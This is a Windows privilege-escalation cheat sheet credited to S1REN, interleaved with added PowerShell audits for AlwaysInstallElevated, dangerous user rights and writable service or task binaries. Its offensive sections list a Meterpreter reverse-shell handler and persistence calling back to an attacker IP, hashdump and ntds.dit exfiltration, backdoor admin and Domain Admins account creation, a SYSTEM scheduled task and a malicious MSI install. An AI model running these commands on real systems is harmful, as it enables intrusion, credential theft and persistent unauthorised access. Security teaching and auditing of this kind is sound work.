
Windows Privilege Escalation
S1REN
Going up.
TL;DR
+-------------------------------+
| INITIAL ENUMERATION           |
+-------------------------------+
DOMAIN ENUM (if joined)
BloodHound / SharpHound
WHOAMI?
whoami
echo %username%
PRIVILEGES?
whoami /priv
SYSTEM INFO
systeminfo
wmic os get Caption,CSDVersion,OSArchitecture,Version
SERVICES
wmic service get name,startname
net start
ADMIN CHECK
net localgroup administrators
net user
NETWORK
netstat -anoy
route print
arp -A
ipconfig /all
USERS
net users
net user
net localgroup
FIREWALL
netsh advfirewall firewall show rule name=all
SCHEDULED TASKS
schtasks /query /fo LIST /v > schtasks.txt
INSTALLATION RIGHTS
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
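The two reg queries above only matter together: Windows Installer runs a package as SYSTEM only when AlwaysInstallElevated is 1 in both the HKLM and the HKCU policy key. The following PowerShell is an added example, not part of S1REN's sheet, that reads both keys, reports whether the policy is actually effective, and prints the fix; the registry paths are the ones on the page, and nothing else is assumed.

```powershell
# Added example, not from S1REN's sheet: audit AlwaysInstallElevated.
# Windows Installer runs packages as SYSTEM only when the value is 1 in BOTH
# the machine (HKLM) and the user (HKCU) policy key; one alone is harmless.
$policyKeys = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $enabled = @{}
    foreach ($hive in $policyKeys.Keys) {
        try {
            $item = Get-ItemProperty -Path $policyKeys[$hive] -Name AlwaysInstallElevated -ErrorAction Stop
            $enabled[$hive] = ($item.AlwaysInstallElevated -eq 1)
        } catch {
            $enabled[$hive] = $false   # key or value absent: not configured in this hive
        }
    }
    [pscustomobject]@{
        HKLM        = $enabled['HKLM']
        HKCU        = $enabled['HKCU']
        Exploitable = ($enabled['HKLM'] -and $enabled['HKCU'])
    }
}

$state = Get-AlwaysInstallElevatedState
$state | Format-List

if ($state.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is on in both hives: any local user can run an MSI as SYSTEM.'
    Write-Host 'Fix: disable "Always install with elevated privileges" under both Computer and User'
    Write-Host 'Configuration > Administrative Templates > Windows Components > Windows Installer,'
    Write-Host 'or clear the machine value directly (requires admin):'
    Write-Host '  Set-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer -Name AlwaysInstallElevated -Value 0'
}
```

A value of 1 in HKCU alone (common when a user has fiddled with their own policy) is not a finding; the check only flags the combination.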
+-----------------------------------------------------------------------+
| WINDOWS PRIV ESC: GITHUB EXPLOITS                                     |
+-----------------------------------------------------------------------+
| Privilege Name              | GitHub PoC                              |
|---------------------------- |-----------------------------------------|
| SeDebugPrivilege            | github.com/bruno-1337/SeDebugPrivilege- |
| SeImpersonatePrivilege      | github.com/itm4n/PrintSpoofer           |
| SeAssignPrimaryToken        | github.com/b4rdia/HackTricks            |
| SeTcbPrivilege              | github.com/hatRiot/token-priv           |
| SeCreateTokenPrivilege      | github.com/hatRiot/token-priv           |
| SeLoadDriverPrivilege       | github.com/k4sth4/SeLoadDriverPrivilege |
| SeTakeOwnershipPrivilege    | github.com/hatRiot/token-priv           |
| SeRestorePrivilege          | github.com/xct/SeRestoreAbuse           |
| SeBackupPrivilege           | github.com/k4sth4/SeBackupPrivilege     |
| SeIncreaseQuotaPrivilege    | github.com/b4rdia/HackTricks            |
| SeSystemEnvironment         | github.com/b4rdia/HackTricks            |
| SeMachineAccount            | github.com/b4rdia/HackTricks            |
| SeTrustedCredManAccess      | learn.microsoft.com/...trusted-caller   |
| SeRelabelPrivilege          | github.com/decoder-it/RelabelAbuse      |
| SeManageVolumePrivilege     | github.com/CsEnox/SeManageVolumeExploit |
| SeCreateGlobalPrivilege     | github.com/b4rdia/HackTricks            |
+-----------------------------------------------------------------------+
Notes:
- PrintSpoofer is gold for SeImpersonatePrivilege.
- SeManageVolume has practical field PoCs.
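From the defender's side, the question the table above raises is which accounts on a host actually hold these rights, since whoami /priv only shows the current token. The following PowerShell is an added example, not part of S1REN's sheet: it exports the local security policy with secedit, parses the [Privilege Rights] section, translates the SIDs, and lists the holders of every privilege in the table (using the full user-right names, e.g. SeAssignPrimaryTokenPrivilege for the table's SeAssignPrimaryToken). It assumes it is run as an administrator, because secedit /export needs that.

```powershell
# Added example, not from S1REN's sheet: who holds the dangerous user rights?
# Requires an elevated prompt (secedit /export fails silently otherwise).
$dangerous = @(
    'SeDebugPrivilege', 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
    'SeTcbPrivilege', 'SeCreateTokenPrivilege', 'SeLoadDriverPrivilege',
    'SeTakeOwnershipPrivilege', 'SeRestorePrivilege', 'SeBackupPrivilege',
    'SeIncreaseQuotaPrivilege', 'SeSystemEnvironmentPrivilege',
    'SeMachineAccountPrivilege', 'SeTrustedCredManAccessPrivilege',
    'SeRelabelPrivilege', 'SeManageVolumePrivilege', 'SeCreateGlobalPrivilege'
)

function Get-UserRightsAssignments {
    $inf = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $inf)) { throw 'secedit export failed: run from an elevated prompt' }
    $lines = Get-Content $inf
    Remove-Item $inf -Force

    $inSection = $false
    foreach ($line in $lines) {
        # Section headers look like [Privilege Rights]; we only want that one
        if ($line -match '^\[(.+)\]') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
        if (-not $inSection -or $line -notmatch '^(Se\w+)\s*=\s*(.*)$') { continue }
        $name = $Matches[1]
        $raw  = $Matches[2]
        # Holders are comma-separated; SIDs carry a leading '*', well-known names do not
        $holders = foreach ($entry in ($raw -split ',')) {
            $p = $entry.Trim()
            if ($p.StartsWith('*')) {
                try {
                    (New-Object System.Security.Principal.SecurityIdentifier($p.Substring(1))).Translate(
                        [System.Security.Principal.NTAccount]).Value
                } catch { $p.Substring(1) }   # unresolvable SID (deleted account): keep the SID
            } else { $p }
        }
        [pscustomobject]@{ Privilege = $name; Holders = ($holders -join ', ') }
    }
}

$report = Get-UserRightsAssignments | Where-Object { $dangerous -contains $_.Privilege }
$report | Sort-Object Privilege | Format-Table -AutoSize -Wrap
```

Anything beyond Administrators, SYSTEM and the built-in service accounts (LOCAL SERVICE, NETWORK SERVICE) holding SeImpersonate, SeDebug, SeBackup/SeRestore or SeLoadDriver is a privesc path and should be removed under Local Security Policy > User Rights Assignment, or the matching GPO. A privilege that is absent from the output is held by nobody.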
+----------------------------+
| MAINTAINING ACCESS         |
+----------------------------+
> METERPRETER REVERSE SHELL SETUP
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <port>
exploit
> PERSISTENCE
meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>
> PORT FORWARDING
meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>
> SYSTEM MIGRATION
meterpreter > run post/windows/manage/migrate
meterpreter > migrate <PID>
> EXECUTE PAYLOADS
powershell.exe "C:\Tools\privesc.ps1"
+-------------------------------+
| PRIVESC CHECKLIST             |
+-------------------------------+
> UNQUOTED SERVICE PATHS
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v "C:\Windows" | findstr /v '"'
(the trailing '"' is PowerShell quoting; from cmd.exe use findstr /v """ instead)
> WEAK SERVICE PERMISSIONS
accesschk.exe -uwcqv <service>
sc qc <service>
icacls "C:\Path\To\Service.exe"
> FILE TRANSFER OPTIONS
certutil.exe
powershell (IEX)
SMB / FTP / TFTP / VBScript
> CLEAR TEXT CREDENTIALS
findstr /si password *.txt *.xml *.ini
dir /s *pass* == *cred* == *.config*
> WEAK FILE PERMISSIONS
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
> NEW ADMIN USER (Local/Domain)
net user siren P@ssw0rd! /add
net localgroup administrators siren /add
net group "Domain Admins" siren /add /domain
+--------------------------------+
| SCHEDULED TASK ABUSE           |
+--------------------------------+
> ENUM
schtasks /query /fo LIST /v > tasks.txt
> CREATE SYSTEM TASK
schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\sirenMaint.exe"
> RUN TASK
schtasks /run /tn "RUNME"
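The unquoted-service-path, weak-service-permission and scheduled-task items above all reduce to one question: is there a binary, or a directory on the search path for one, that runs as SYSTEM but that a standard user can write to? The following PowerShell is an added example, not part of S1REN's sheet, that answers it read-only for the local host. It assumes PowerShell 5 with the ScheduledTasks module (Windows 8 / Server 2012 or later) and treats Everyone, BUILTIN\Users, Authenticated Users and INTERACTIVE as the low-privilege principals; it looks only at Allow ACEs, so an explicit Deny that cancels one of them would produce a false positive worth checking by hand.

```powershell
# Added example, not from S1REN's sheet: read-only audit of the weaknesses in
# the "unquoted service paths", "weak service permissions" and "scheduled task
# abuse" items above. Needs the ScheduledTasks module (Windows 8 / 2012+).
using namespace System.Security.AccessControl

# Principals every standard (non-admin) user belongs to
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let the holder plant, replace or re-ACL a file (plus GENERIC_WRITE / GENERIC_ALL)
$writeMask = [int]([FileSystemRights]::WriteData -bor [FileSystemRights]::AppendData -bor
                   [FileSystemRights]::Delete -bor [FileSystemRights]::WriteDacl -bor
                   [FileSystemRights]::WriteOwner) -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWritable([string]$Path) {
    # Simplification: Allow ACEs only; an explicit Deny for Users would be missed
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [AccessControlType]::Allow) { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights) -band $writeMask) { return $true }
    }
    return $false
}

function Get-ImagePath([string]$CommandLine) {
    # Quoted: the quoted part; unquoted: everything up to the first ".exe"
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($CommandLine -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return ($CommandLine -split ' ')[0]
}

function New-Finding($Type, $Name, $RunsAs, $Start, $Path) {
    [pscustomobject]@{ Type = $Type; Name = $Name; RunsAs = $RunsAs; Start = $Start; Path = $Path }
}

function Get-ServiceFindings {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $image = Get-ImagePath $svc.PathName
        if ($svc.PathName -notmatch '^\s*"' -and $image -match ' ') {
            # Unquoted path with spaces: the SCM tries C:\Program.exe, C:\Program Files\Foo.exe, ...
            # so the directory holding each of those prefixes must not be writable by standard users
            $parts = $image -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $dir = Split-Path ($parts[0..($i - 1)] -join ' ') -Parent
                if (Test-LowPrivWritable $dir) {
                    New-Finding 'UnquotedServicePath' $svc.Name $svc.StartName $svc.StartMode $dir
                }
            }
        }
        if (Test-LowPrivWritable $image) {
            New-Finding 'WritableServiceBinary' $svc.Name $svc.StartName $svc.StartMode $image
        }
        $imageDir = Split-Path $image -Parent
        if (Test-LowPrivWritable $imageDir) {
            New-Finding 'WritableServiceDirectory' $svc.Name $svc.StartName $svc.StartMode $imageDir
        }
    }
}

function Get-TaskFindings {
    foreach ($task in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
        $p = $task.Principal
        # Only tasks that run elevated hand a writer anything worth having
        $elevated = ($p.UserId -in @('SYSTEM', 'S-1-5-18', 'LOCAL SERVICE', 'NETWORK SERVICE')) -or ($p.RunLevel -eq 'Highest')
        if (-not $elevated) { continue }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (Test-LowPrivWritable $exe) {
                New-Finding 'WritableTaskBinary' "$($task.TaskPath)$($task.TaskName)" $p.UserId $task.State $exe
            }
        }
    }
}

$findings = @(Get-ServiceFindings) + @(Get-TaskFindings)
if ($findings.Count) { $findings | Format-Table -AutoSize -Wrap }
else { 'No service or task binaries writable by standard users were found.' }
```

For an UnquotedServicePath finding the fix is to quote the binPath (sc config <service> binPath= "\"C:\Program Files\Vendor\svc.exe\"") and strip write access from the offending directory; for the Writable* findings, reset the file or directory ACL so only Administrators and SYSTEM can modify it. A finding whose RunsAs is a plain user account and whose task RunLevel is Limited is not a privesc path; the script already skips those for tasks, but review the service StartName column with the same eye.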
+-------------------------------+
| POST EXPLOIT ENUMERATION      |
+-------------------------------+
> NETWORK USERS
net user
net user <target>
net localgroup administrators
> NT AUTHORITY CHECKS
whoami
accesschk.exe /accepteula
MS09-012.exe "whoami"
> HASH DUMP
meterpreter > hashdump
> EXFILTRATE ntds.dit
Use secretsdump.py or disk capture tools
> INSTALLER ABUSE
AlwaysInstallElevated = 1 (must be set in both HKLM and HKCU)
msiexec /i evil.msi
> SHARE ENUMERATION
net share
net use
net use Z: \\TARGET\SHARE /persistent:yes
+----------------------------+
| TOOLKIT / RESOURCES        |
+----------------------------+
> Windows Exploit Suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
> Cross Compile Payloads (Linux > Windows)
apt-get install mingw-w64
x86: i686-w64-mingw32-gcc hello.c -o hello.exe
x64: x86_64-w64-mingw32-gcc hello.c -o hello64.exe
> Additional Reading
https://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation